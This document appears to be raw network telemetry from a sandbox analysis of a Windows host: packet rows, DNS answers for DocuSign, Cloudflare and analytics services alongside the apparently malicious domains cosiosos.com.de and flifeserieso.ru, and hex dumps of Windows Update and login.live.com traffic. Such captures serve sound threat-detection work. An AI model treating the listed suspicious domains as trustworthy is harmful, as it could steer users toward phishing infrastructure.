Oct 29, 2024 18:45:10.894679070 CET	53	54882	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:10.895458937 CET	53	54460	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:13.325393915 CET	55577	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:13.325537920 CET	53578	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:13.333338976 CET	53	53578	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:13.333359003 CET	53	55577	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:13.885819912 CET	54130	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:13.885960102 CET	52770	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:13.891338110 CET	64239	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:13.891877890 CET	55090	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:13.900264978 CET	53	64239	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:13.918678045 CET	53	55090	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:15.028147936 CET	59016	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:15.028327942 CET	58481	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:15.052434921 CET	57625	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:15.052576065 CET	59652	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:15.065310001 CET	53	58481	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:15.068404913 CET	53	59016	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:15.948766947 CET	63285	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:15.949021101 CET	56129	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:15.957079887 CET	53	63285	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:15.958889008 CET	53	56129	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:16.775310040 CET	62966	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:16.775446892 CET	51037	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:16.783890009 CET	53	62966	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:16.784174919 CET	53	51037	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:26.801037073 CET	53	51333	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:29.501483917 CET	59511	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:29.501621008 CET	61906	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:29.509995937 CET	53	59511	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:29.510060072 CET	53	61906	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:30.395823956 CET	63074	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:30.395947933 CET	59281	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:30.403671026 CET	53	63074	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:30.404073000 CET	53	59281	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:44.926677942 CET	51581	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:44.926804066 CET	55819	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:46.320161104 CET	53	60123	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:48.731966972 CET	138	138	192.168.2.16	192.168.2.255
Oct 29, 2024 18:46:04.787967920 CET	53	54282	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:07.959089041 CET	53	49809	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:08.468941927 CET	53	63937	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:09.754657030 CET	52320	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:09.754815102 CET	53680	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:21.602029085 CET	49968	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:21.602133989 CET	54720	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:21.611905098 CET	53	54720	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:21.621346951 CET	53	49968	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:21.901540041 CET	55923	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:21.901688099 CET	63348	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:23.172246933 CET	58202	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:23.172389984 CET	52615	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:26.003407955 CET	61254	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:26.003844976 CET	49288	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:26.012028933 CET	53	61254	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:26.013417959 CET	53	49288	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:27.956650019 CET	49265	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:27.956835032 CET	62974	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:27.964579105 CET	53	49265	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:27.964596033 CET	53	62974	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:27.974292994 CET	56783	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:27.974495888 CET	57833	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:27.982048988 CET	53	57833	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:27.983050108 CET	53	56783	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:29.194344997 CET	53544	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:29.194406033 CET	56166	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:29.202146053 CET	53	56166	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:29.202821970 CET	53	53544	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:37.412446022 CET	53	64572	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:53.753357887 CET	50547	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:53.753530025 CET	61180	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:53.761338949 CET	53	61180	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:53.761909962 CET	53	50547	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:54.879002094 CET	58029	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:54.879153013 CET	53489	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:54.887293100 CET	53	53489	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:54.887964010 CET	53	58029	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:54.983257055 CET	58992	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:54.983406067 CET	52763	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:55.072613001 CET	53	52763	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:55.079051018 CET	53	58992	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:55.372962952 CET	50128	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:55.373102903 CET	64643	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:59.693284035 CET	57843	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:59.693401098 CET	51798	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:59.776963949 CET	53982	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:59.777097940 CET	65051	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:46:59.783046007 CET	53	51798	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:59.783319950 CET	53	57843	1.1.1.1	192.168.2.16
Oct 29, 2024 18:46:59.786484957 CET	53	65051	1.1.1.1	192.168.2.16

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Oct 29, 2024 18:45:13.918745995 CET	192.168.2.16	1.1.1.1	c274	(Port unreachable)	Destination Unreachable
Oct 29, 2024 18:45:44.962497950 CET	192.168.2.16	1.1.1.1	c273	(Port unreachable)	Destination Unreachable
Oct 29, 2024 18:46:09.784846067 CET	192.168.2.16	1.1.1.1	c273	(Port unreachable)	Destination Unreachable
Oct 29, 2024 18:46:55.421277046 CET	192.168.2.16	1.1.1.1	c273	(Port unreachable)	Destination Unreachable

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 29, 2024 18:45:08.628916025 CET	1.1.1.1	192.168.2.16	0xd701	No error (0)	eu.docusign.net	eu.docusign.net.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:45:08.629842043 CET	1.1.1.1	192.168.2.16	0x28c8	No error (0)	eu.docusign.net	eu.docusign.net.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:45:13.333338976 CET	1.1.1.1	192.168.2.16	0x9bb5	No error (0)	www.google.com			65	IN (0x0001)	false
Oct 29, 2024 18:45:13.333359003 CET	1.1.1.1	192.168.2.16	0x590f	No error (0)	www.google.com		142.250.186.100	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:13.897063971 CET	1.1.1.1	192.168.2.16	0xab38	No error (0)	docucdn-a.akamaihd.net	docucdn-a.akamaihd.net.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:45:13.897231102 CET	1.1.1.1	192.168.2.16	0x7401	No error (0)	docucdn-a.akamaihd.net	docucdn-a.akamaihd.net.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:45:13.900264978 CET	1.1.1.1	192.168.2.16	0x99c	No error (0)	a.docusign.com	arya-1323461286.us-west-2.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:45:13.900264978 CET	1.1.1.1	192.168.2.16	0x99c	No error (0)	arya-1323461286.us-west-2.elb.amazonaws.com		34.223.160.188	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:13.900264978 CET	1.1.1.1	192.168.2.16	0x99c	No error (0)	arya-1323461286.us-west-2.elb.amazonaws.com		54.187.212.170	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:13.900264978 CET	1.1.1.1	192.168.2.16	0x99c	No error (0)	arya-1323461286.us-west-2.elb.amazonaws.com		52.42.45.237	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:13.918678045 CET	1.1.1.1	192.168.2.16	0x9a46	No error (0)	a.docusign.com	arya-1323461286.us-west-2.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:45:15.061012030 CET	1.1.1.1	192.168.2.16	0x4ba4	No error (0)	docucdn-a.akamaihd.net	docucdn-a.akamaihd.net.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:45:15.061275005 CET	1.1.1.1	192.168.2.16	0x2ffb	No error (0)	docucdn-a.akamaihd.net	docucdn-a.akamaihd.net.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:45:15.065310001 CET	1.1.1.1	192.168.2.16	0xf925	No error (0)	a.docusign.com	arya-1323461286.us-west-2.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:45:15.068404913 CET	1.1.1.1	192.168.2.16	0x2ffe	No error (0)	a.docusign.com	arya-1323461286.us-west-2.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:45:15.068404913 CET	1.1.1.1	192.168.2.16	0x2ffe	No error (0)	arya-1323461286.us-west-2.elb.amazonaws.com		52.42.45.237	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:15.068404913 CET	1.1.1.1	192.168.2.16	0x2ffe	No error (0)	arya-1323461286.us-west-2.elb.amazonaws.com		34.223.160.188	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:15.068404913 CET	1.1.1.1	192.168.2.16	0x2ffe	No error (0)	arya-1323461286.us-west-2.elb.amazonaws.com		54.187.212.170	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:15.957079887 CET	1.1.1.1	192.168.2.16	0xa5f4	No error (0)	api.mixpanel.com		130.211.34.183	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:15.957079887 CET	1.1.1.1	192.168.2.16	0xa5f4	No error (0)	api.mixpanel.com		35.186.241.51	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:15.957079887 CET	1.1.1.1	192.168.2.16	0xa5f4	No error (0)	api.mixpanel.com		107.178.240.159	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:15.957079887 CET	1.1.1.1	192.168.2.16	0xa5f4	No error (0)	api.mixpanel.com		35.190.25.25	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:16.783890009 CET	1.1.1.1	192.168.2.16	0xe320	No error (0)	api.mixpanel.com		130.211.34.183	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:16.783890009 CET	1.1.1.1	192.168.2.16	0xe320	No error (0)	api.mixpanel.com		107.178.240.159	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:16.783890009 CET	1.1.1.1	192.168.2.16	0xe320	No error (0)	api.mixpanel.com		35.190.25.25	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:16.783890009 CET	1.1.1.1	192.168.2.16	0xe320	No error (0)	api.mixpanel.com		35.186.241.51	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:29.509995937 CET	1.1.1.1	192.168.2.16	0xfb12	No error (0)	cdn.optimizely.com		104.18.65.57	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:29.509995937 CET	1.1.1.1	192.168.2.16	0xfb12	No error (0)	cdn.optimizely.com		104.18.66.57	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:29.510060072 CET	1.1.1.1	192.168.2.16	0xbdaf	No error (0)	cdn.optimizely.com			65	IN (0x0001)	false
Oct 29, 2024 18:45:30.403671026 CET	1.1.1.1	192.168.2.16	0xbeb0	No error (0)	cdn.optimizely.com		104.18.65.57	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:30.403671026 CET	1.1.1.1	192.168.2.16	0xbeb0	No error (0)	cdn.optimizely.com		104.18.66.57	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:45:30.404073000 CET	1.1.1.1	192.168.2.16	0xb268	No error (0)	cdn.optimizely.com			65	IN (0x0001)	false
Oct 29, 2024 18:45:44.935271025 CET	1.1.1.1	192.168.2.16	0x1f72	No error (0)	eu.docusign.net	eu.docusign.net.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:45:44.962405920 CET	1.1.1.1	192.168.2.16	0x203	No error (0)	eu.docusign.net	eu.docusign.net.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:46:09.762913942 CET	1.1.1.1	192.168.2.16	0xbe3f	No error (0)	eu.docusign.net	eu.docusign.net.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:46:09.784748077 CET	1.1.1.1	192.168.2.16	0xe2f8	No error (0)	eu.docusign.net	eu.docusign.net.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:46:21.611905098 CET	1.1.1.1	192.168.2.16	0x81a3	No error (0)	cosiosos.com.de			65	IN (0x0001)	false
Oct 29, 2024 18:46:21.621346951 CET	1.1.1.1	192.168.2.16	0xd6b0	No error (0)	cosiosos.com.de		104.21.28.165	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:46:21.621346951 CET	1.1.1.1	192.168.2.16	0xd6b0	No error (0)	cosiosos.com.de		172.67.170.241	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:46:21.909517050 CET	1.1.1.1	192.168.2.16	0xd6da	No error (0)	docucdn-a.akamaihd.net	docucdn-a.akamaihd.net.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:46:21.911724091 CET	1.1.1.1	192.168.2.16	0x3115	No error (0)	docucdn-a.akamaihd.net	docucdn-a.akamaihd.net.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:46:23.181147099 CET	1.1.1.1	192.168.2.16	0xd5cb	No error (0)	docucdn-a.akamaihd.net	docucdn-a.akamaihd.net.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:46:23.182303905 CET	1.1.1.1	192.168.2.16	0x629b	No error (0)	docucdn-a.akamaihd.net	docucdn-a.akamaihd.net.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:46:26.012028933 CET	1.1.1.1	192.168.2.16	0x234	No error (0)	challenges.cloudflare.com		104.18.95.41	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:46:26.012028933 CET	1.1.1.1	192.168.2.16	0x234	No error (0)	challenges.cloudflare.com		104.18.94.41	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:46:26.013417959 CET	1.1.1.1	192.168.2.16	0xd55f	No error (0)	challenges.cloudflare.com			65	IN (0x0001)	false
Oct 29, 2024 18:46:27.964579105 CET	1.1.1.1	192.168.2.16	0x2b06	No error (0)	challenges.cloudflare.com		104.18.94.41	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:46:27.964579105 CET	1.1.1.1	192.168.2.16	0x2b06	No error (0)	challenges.cloudflare.com		104.18.95.41	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:46:27.964596033 CET	1.1.1.1	192.168.2.16	0xa15a	No error (0)	challenges.cloudflare.com			65	IN (0x0001)	false
Oct 29, 2024 18:46:27.982048988 CET	1.1.1.1	192.168.2.16	0xae2e	No error (0)	challenges.cloudflare.com			65	IN (0x0001)	false
Oct 29, 2024 18:46:27.983050108 CET	1.1.1.1	192.168.2.16	0xa942	No error (0)	challenges.cloudflare.com		104.18.94.41	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:46:27.983050108 CET	1.1.1.1	192.168.2.16	0xa942	No error (0)	challenges.cloudflare.com		104.18.95.41	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:46:29.202821970 CET	1.1.1.1	192.168.2.16	0x787a	No error (0)	a.nel.cloudflare.com		35.190.80.1	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:46:53.761338949 CET	1.1.1.1	192.168.2.16	0x2e7	No error (0)	cdnjs.cloudflare.com			65	IN (0x0001)	false
Oct 29, 2024 18:46:53.761909962 CET	1.1.1.1	192.168.2.16	0xd1c1	No error (0)	cdnjs.cloudflare.com		104.17.24.14	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:46:53.761909962 CET	1.1.1.1	192.168.2.16	0xd1c1	No error (0)	cdnjs.cloudflare.com		104.17.25.14	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:46:54.887293100 CET	1.1.1.1	192.168.2.16	0xcaa6	No error (0)	cdnjs.cloudflare.com			65	IN (0x0001)	false
Oct 29, 2024 18:46:54.887964010 CET	1.1.1.1	192.168.2.16	0x9f2d	No error (0)	cdnjs.cloudflare.com		104.17.24.14	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:46:54.887964010 CET	1.1.1.1	192.168.2.16	0x9f2d	No error (0)	cdnjs.cloudflare.com		104.17.25.14	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:46:55.072613001 CET	1.1.1.1	192.168.2.16	0x7a4b	No error (0)	flifeserieso.ru			65	IN (0x0001)	false
Oct 29, 2024 18:46:55.079051018 CET	1.1.1.1	192.168.2.16	0x93fd	No error (0)	flifeserieso.ru		104.21.17.93	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:46:55.079051018 CET	1.1.1.1	192.168.2.16	0x93fd	No error (0)	flifeserieso.ru		172.67.175.107	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:46:55.381664038 CET	1.1.1.1	192.168.2.16	0xb463	No error (0)	eu.docusign.net	eu.docusign.net.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:46:55.421180964 CET	1.1.1.1	192.168.2.16	0xfcca	No error (0)	eu.docusign.net	eu.docusign.net.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:46:59.783046007 CET	1.1.1.1	192.168.2.16	0xc0c1	No error (0)	flifeserieso.ru			65	IN (0x0001)	false
Oct 29, 2024 18:46:59.783319950 CET	1.1.1.1	192.168.2.16	0xd892	No error (0)	flifeserieso.ru		172.67.175.107	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:46:59.783319950 CET	1.1.1.1	192.168.2.16	0xd892	No error (0)	flifeserieso.ru		104.21.17.93	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:46:59.785255909 CET	1.1.1.1	192.168.2.16	0x99c5	No error (0)	cdn.jsdelivr.net	cdn.jsdelivr.net.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 18:46:59.786484957 CET	1.1.1.1	192.168.2.16	0x8244	No error (0)	cdn.jsdelivr.net	jsdelivr.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:44:57 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Nml3ll1nFVeUPX2&MD=cANLcvmX HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-10-29 17:44:58 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: d0ac7f07-deeb-4117-a4a4-c7fdadaa8e77 MS-RequestId: bf8e355a-045d-4d4d-b0d5-e7c48e23c761 MS-CV: R5LvapTaE0i8sXcU.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Tue, 29 Oct 2024 17:44:57 GMT Connection: close Content-Length: 24490
2024-10-29 17:44:58 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-10-29 17:44:58 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:45:00 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-10-29 17:45:00 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-10-29 17:45:01 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Tue, 29 Oct 2024 17:44:01 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C538_SN1 x-ms-request-id: f5b655a5-7813-4b7e-bfa1-64b3d9cb47ea PPServer: PPV: 30 H: SN1PEPF0002F048 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Tue, 29 Oct 2024 17:45:00 GMT Connection: close Content-Length: 11392
2024-10-29 17:45:01 UTC	11392	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Timestamp	Bytes transferred	Direction	Data
